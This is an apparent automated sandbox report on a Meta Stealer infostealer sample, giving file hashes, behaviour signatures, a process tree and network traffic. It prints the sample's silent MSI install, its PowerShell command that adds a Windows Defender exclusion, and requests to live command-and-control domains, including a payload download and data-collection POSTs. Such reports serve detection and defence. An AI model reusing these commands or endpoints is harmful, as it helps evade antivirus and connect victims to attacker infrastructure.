Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    10/04/2024, 08:23 UTC

General

  • Target

    file_transfer_tools.exe

  • Size

    801KB

  • MD5

    41dcc29d7eaba7b84fd54323394712af

  • SHA1

    ddc0100723cc2dc9ae8b02a0cb7fe4a86c02d54b

  • SHA256

    a909bef708a47ae428fedbc566132c56f15ae7511dc460cf22055ec1a72d485a

  • SHA512

    5a3e8c1eda558e0b90470d752490bc4d04610f93e453cbfd9013a363cfdf5e607974d526c49efe2ef0440e241d775b66bd7c48c74ee9e8677a37cdedc30c42ee

  • SSDEEP

    6144:xmbuKA33X1rgMuu+xdaXkW+zF6m8XZPELSrPzA:x6XA33X1rTuuyrVZ6m8XGH

Malware Config

Signatures

  • Meta Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • MetaStealer payload 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file_transfer_tools.exe
    "C:\Users\Admin\AppData\Local\Temp\file_transfer_tools.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /i "C:\Users\Admin\AppData\Local\Microsoft\Windows\windrv.msi" /Qn
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 56D0850E81A5AA128ED9F3E9C1DFFCFC
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:2564
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:2116
      • C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\files\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\files\setup.exe" /VERYSILENT /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\SysWOW64\systeminfo.exe
          systeminfo
          4⤵
          • Gathers system information
          PID:632
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Microsoft\windows\systemtask.exe"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:336

Network

  • flag-us
    DNS
    kiyaqoimsiieeyqa.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    kiyaqoimsiieeyqa.xyz
    IN A
    Response
  • flag-us
    DNS
    ssqsmisuowqcwsqo.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    ssqsmisuowqcwsqo.xyz
    IN A
    Response
  • flag-us
    DNS
    ykqmwgsuummieaug.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    ykqmwgsuummieaug.xyz
    IN A
    Response
  • flag-us
    DNS
    ewukeskgqswqesiw.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    ewukeskgqswqesiw.xyz
    IN A
    Response
  • flag-us
    DNS
    cscqcsgewmwwaaui.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    cscqcsgewmwwaaui.xyz
    IN A
    Response
    cscqcsgewmwwaaui.xyz
    IN A
    188.40.187.174
  • flag-de
    GET
    http://cscqcsgewmwwaaui.xyz:443/api/client_hello
    setup.exe
    Remote address:
    188.40.187.174:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: cscqcsgewmwwaaui.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.25.4
    Date: Wed, 10 Apr 2024 08:24:10 GMT
    Content-Type: text/html
    Content-Length: 255
    Connection: close
  • flag-us
    DNS
    cyoksykiamiscyia.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    cyoksykiamiscyia.xyz
    IN A
    Response
    cyoksykiamiscyia.xyz
    IN A
    34.174.206.7
  • flag-us
    GET
    http://cyoksykiamiscyia.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.174.206.7:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: cyoksykiamiscyia.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    DNS
    okgomokemoucqeso.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    okgomokemoucqeso.xyz
    IN A
    Response
    okgomokemoucqeso.xyz
    IN A
    34.91.32.224
  • flag-nl
    GET
    http://okgomokemoucqeso.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.91.32.224:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: okgomokemoucqeso.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    DNS
    ikwacuakiqeimwua.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    ikwacuakiqeimwua.xyz
    IN A
    Response
    ikwacuakiqeimwua.xyz
    IN A
    34.94.245.237
  • flag-us
    GET
    http://ikwacuakiqeimwua.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.94.245.237:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: ikwacuakiqeimwua.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    DNS
    aawcsqqaywckiwmi.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    aawcsqqaywckiwmi.xyz
    IN A
    Response
    aawcsqqaywckiwmi.xyz
    IN A
    34.143.245.173
  • flag-sg
    GET
    http://aawcsqqaywckiwmi.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.143.245.173:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: aawcsqqaywckiwmi.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    DNS
    aiqasksgmyeqocei.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    aiqasksgmyeqocei.xyz
    IN A
    Response
  • flag-us
    DNS
    qgumcuisgaeyuqqe.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    qgumcuisgaeyuqqe.xyz
    IN A
    Response
    qgumcuisgaeyuqqe.xyz
    IN A
    185.200.191.210
  • flag-us
    GET
    http://qgumcuisgaeyuqqe.xyz:443/api/client_hello
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:13 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 4dae8dcc-4990-49ae-ba84-eb45a7e8049a
    Connection: close
  • flag-us
    GET
    http://qgumcuisgaeyuqqe.xyz:443/avast_update
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    GET /avast_update HTTP/1.1
    Accept: */*
    Connection: close
    File-Type: 0
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:16 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 1de512bd-7683-48e8-a016-64d2ef15bf24
    Connection: close
    Transfer-Encoding: chunked
  • flag-de
    GET
    http://cscqcsgewmwwaaui.xyz:443/api/client_hello
    setup.exe
    Remote address:
    188.40.187.174:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: cscqcsgewmwwaaui.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.25.4
    Date: Wed, 10 Apr 2024 08:24:20 GMT
    Content-Type: text/html
    Content-Length: 255
    Connection: close
  • flag-us
    GET
    http://cyoksykiamiscyia.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.174.206.7:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: cyoksykiamiscyia.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-nl
    GET
    http://okgomokemoucqeso.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.91.32.224:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: okgomokemoucqeso.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    GET
    http://ikwacuakiqeimwua.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.94.245.237:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: ikwacuakiqeimwua.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-sg
    GET
    http://aawcsqqaywckiwmi.xyz:443/api/client_hello
    setup.exe
    Remote address:
    34.143.245.173:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: aawcsqqaywckiwmi.xyz:443
    User-Agent: cpp-httplib/0.12.1
  • flag-us
    GET
    http://qgumcuisgaeyuqqe.xyz:443/api/client_hello
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:22 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 8351149d-8d3a-491a-9e9c-e59cfedf88e4
    Connection: close
  • flag-us
    POST
    http://qgumcuisgaeyuqqe.xyz:443/api/client/new
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    POST /api/client/new HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 32
    Content-Type: application/json
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 46
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:22 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 6e7f1f17-072c-4694-8522-911eac6af128
    Connection: close
  • flag-us
    POST
    http://qgumcuisgaeyuqqe.xyz:443/tasks/get_worker
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    POST /tasks/get_worker HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 68
    Content-Type: application/json
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 167
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:23 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: e446b6c1-e99d-4f88-9855-21aaf9438c50
    Connection: close
  • flag-us
    POST
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 4324
    Content-Type: application/json
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:25 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 807fe377-2a26-49ec-b592-55284123b414
    Connection: close
  • flag-us
    POST
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 148
    Content-Type: application/json
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:25 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 4a82484c-3f25-4f87-86ac-fe2819d682a2
    Connection: close
  • flag-us
    POST
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    setup.exe
    Remote address:
    185.200.191.210:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 148
    Content-Type: application/json
    Host: qgumcuisgaeyuqqe.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 10 Apr 2024 08:24:25 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: ec575c30-826d-478d-a1b3-8207e1c8a897
    Connection: close
  • 188.40.187.174:443
    http://cscqcsgewmwwaaui.xyz:443/api/client_hello
    http
    setup.exe
    406 B
    619 B
    6
    5

    HTTP Request

    GET http://cscqcsgewmwwaaui.xyz:443/api/client_hello

    HTTP Response

    400
  • 34.174.206.7:443
    http://cyoksykiamiscyia.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://cyoksykiamiscyia.xyz:443/api/client_hello
  • 34.91.32.224:443
    http://okgomokemoucqeso.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://okgomokemoucqeso.xyz:443/api/client_hello
  • 34.94.245.237:443
    http://ikwacuakiqeimwua.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://ikwacuakiqeimwua.xyz:443/api/client_hello
  • 34.143.245.173:443
    http://aawcsqqaywckiwmi.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://aawcsqqaywckiwmi.xyz:443/api/client_hello
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    457 B
    5
    5

    HTTP Request

    GET http://qgumcuisgaeyuqqe.xyz:443/api/client_hello

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/avast_update
    http
    setup.exe
    218.7kB
    10.1MB
    4254
    7235

    HTTP Request

    GET http://qgumcuisgaeyuqqe.xyz:443/avast_update

    HTTP Response

    200
  • 188.40.187.174:443
    http://cscqcsgewmwwaaui.xyz:443/api/client_hello
    http
    setup.exe
    406 B
    619 B
    6
    5

    HTTP Request

    GET http://cscqcsgewmwwaaui.xyz:443/api/client_hello

    HTTP Response

    400
  • 34.174.206.7:443
    http://cyoksykiamiscyia.xyz:443/api/client_hello
    http
    setup.exe
    406 B
    132 B
    6
    3

    HTTP Request

    GET http://cyoksykiamiscyia.xyz:443/api/client_hello
  • 34.91.32.224:443
    http://okgomokemoucqeso.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://okgomokemoucqeso.xyz:443/api/client_hello
  • 34.94.245.237:443
    http://ikwacuakiqeimwua.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://ikwacuakiqeimwua.xyz:443/api/client_hello
  • 34.143.245.173:443
    http://aawcsqqaywckiwmi.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    132 B
    5
    3

    HTTP Request

    GET http://aawcsqqaywckiwmi.xyz:443/api/client_hello
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    457 B
    5
    5

    HTTP Request

    GET http://qgumcuisgaeyuqqe.xyz:443/api/client_hello

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/api/client/new
    http
    setup.exe
    483 B
    531 B
    6
    6

    HTTP Request

    POST http://qgumcuisgaeyuqqe.xyz:443/api/client/new

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/tasks/get_worker
    http
    setup.exe
    521 B
    653 B
    6
    6

    HTTP Request

    POST http://qgumcuisgaeyuqqe.xyz:443/tasks/get_worker

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    http
    setup.exe
    4.9kB
    617 B
    9
    9

    HTTP Request

    POST http://qgumcuisgaeyuqqe.xyz:443/tasks/collect

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    http
    setup.exe
    599 B
    497 B
    6
    6

    HTTP Request

    POST http://qgumcuisgaeyuqqe.xyz:443/tasks/collect

    HTTP Response

    200
  • 185.200.191.210:443
    http://qgumcuisgaeyuqqe.xyz:443/tasks/collect
    http
    setup.exe
    599 B
    497 B
    6
    6

    HTTP Request

    POST http://qgumcuisgaeyuqqe.xyz:443/tasks/collect

    HTTP Response

    200
  • 8.8.8.8:53
    kiyaqoimsiieeyqa.xyz
    dns
    setup.exe
    66 B
    139 B
    1
    1

    DNS Request

    kiyaqoimsiieeyqa.xyz

  • 8.8.8.8:53
    ssqsmisuowqcwsqo.xyz
    dns
    setup.exe
    66 B
    131 B
    1
    1

    DNS Request

    ssqsmisuowqcwsqo.xyz

  • 8.8.8.8:53
    ykqmwgsuummieaug.xyz
    dns
    setup.exe
    66 B
    131 B
    1
    1

    DNS Request

    ykqmwgsuummieaug.xyz

  • 8.8.8.8:53
    ewukeskgqswqesiw.xyz
    dns
    setup.exe
    66 B
    139 B
    1
    1

    DNS Request

    ewukeskgqswqesiw.xyz

  • 8.8.8.8:53
    cscqcsgewmwwaaui.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    cscqcsgewmwwaaui.xyz

    DNS Response

    188.40.187.174

  • 8.8.8.8:53
    cyoksykiamiscyia.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    cyoksykiamiscyia.xyz

    DNS Response

    34.174.206.7

  • 8.8.8.8:53
    okgomokemoucqeso.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    okgomokemoucqeso.xyz

    DNS Response

    34.91.32.224

  • 8.8.8.8:53
    ikwacuakiqeimwua.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    ikwacuakiqeimwua.xyz

    DNS Response

    34.94.245.237

  • 8.8.8.8:53
    aawcsqqaywckiwmi.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    aawcsqqaywckiwmi.xyz

    DNS Response

    34.143.245.173

  • 8.8.8.8:53
    aiqasksgmyeqocei.xyz
    dns
    setup.exe
    66 B
    139 B
    1
    1

    DNS Request

    aiqasksgmyeqocei.xyz

  • 8.8.8.8:53
    qgumcuisgaeyuqqe.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    qgumcuisgaeyuqqe.xyz

    DNS Response

    185.200.191.210

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\windrv.msi

    Filesize

    3.8MB

    MD5

    7896667f54fe3e6e0d275104d878fec1

    SHA1

    e1ba924eabb739d33036e76bb7355f8e2f5742bd

    SHA256

    6293a90db282d0b5f36a46903cf184ab3bf25e99c2b24042a84b7aebcdf08c3b

    SHA512

    7784e9cc1fa115e2026a67fe5734db22d81f35bfb3cc2f86048cbf45e2cdea9bef70aebe70ffaf8c09b729afdc7b786e2e2647c5b82551b77166af4c334ff7e3

  • C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\files.cab

    Filesize

    3.5MB

    MD5

    8d210cf5a4958e5b408d9416f2582661

    SHA1

    6c292799e29293a2233b3bea9e8c22734636426f

    SHA256

    37e0ec91d08372051edd9c3da83a689f6551b6fc2a50bd08429065d3c8ed3e0b

    SHA512

    7b8afcdd99d5e871afa54fb375606ecc9c693d19ace084c2121f3ae50551e102314641edaeb11331caa7a244cf40067249ffa2f71f27e040aa92874ff174b812

  • C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\files\setup.exe

    Filesize

    354.2MB

    MD5

    9b25254c4e427d0946e6c3b57758bc9d

    SHA1

    9051ea055e4306e29df34263bee2ed5bfe104073

    SHA256

    2e69b2ba6310cb4ce3ddafc169c5ddcf8ec881186dc565227976bc29863fd0e9

    SHA512

    53ca94eff3e68a629d1125f3a9117ff2a181ce37b91b9a1f6f5cc814676a072e9ad52febff7cbdd3646e310162d65c96d244d1a253a279e0a216fc0f12b3971e

  • C:\Users\Admin\AppData\Local\Temp\MW-7a345e6c-527e-494b-991d-b4aaf3af9e04\msiwrapper.ini

    Filesize

    1KB

    MD5

    8e9a4cc1b3393243e34572401329cfc6

    SHA1

    2b5f1a12c404b7099cd886651cdeb916673857f7

    SHA256

    9280935667e87f8011edebabc20fcf3feaa1adbcbd42df103038d131f90f1bcf

    SHA512

    1dbc39db1731e5c3281ff68b31fea1d57301009c43d9edaaec6630280fdd8f732335b61898fc20c435161770e144e84fa7bb8f7de171389a2ae5113b5e34af39

  • C:\Windows\Installer\MSI169C.tmp

    Filesize

    208KB

    MD5

    0c8921bbcc37c6efd34faf44cf3b0cb5

    SHA1

    dcfa71246157edcd09eecaf9d4c5e360b24b3e49

    SHA256

    fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

    SHA512

    ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

  • memory/336-88-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

  • memory/336-85-0x0000000073850000-0x0000000073DFB000-memory.dmp

    Filesize

    5.7MB

  • memory/336-86-0x0000000073850000-0x0000000073DFB000-memory.dmp

    Filesize

    5.7MB

  • memory/336-87-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

  • memory/336-90-0x0000000073850000-0x0000000073DFB000-memory.dmp

    Filesize

    5.7MB

  • memory/336-91-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

  • memory/336-92-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

  • memory/336-93-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

  • memory/1552-69-0x0000000000360000-0x00000000003DA000-memory.dmp

    Filesize

    488KB

  • memory/1552-72-0x0000000010000000-0x000000001072E000-memory.dmp

    Filesize

    7.2MB

  • memory/1552-84-0x0000000000360000-0x00000000003DA000-memory.dmp

    Filesize

    488KB

  • memory/1552-67-0x0000000000360000-0x00000000003DA000-memory.dmp

    Filesize

    488KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.